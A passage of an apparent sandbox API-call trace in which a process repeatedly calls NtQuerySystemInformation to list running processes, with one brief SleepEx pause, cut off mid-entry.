[0230.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.051] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.080] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0232.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe4e0) returned 0x0 [0232.691] NtQuerySystemInformation (in: 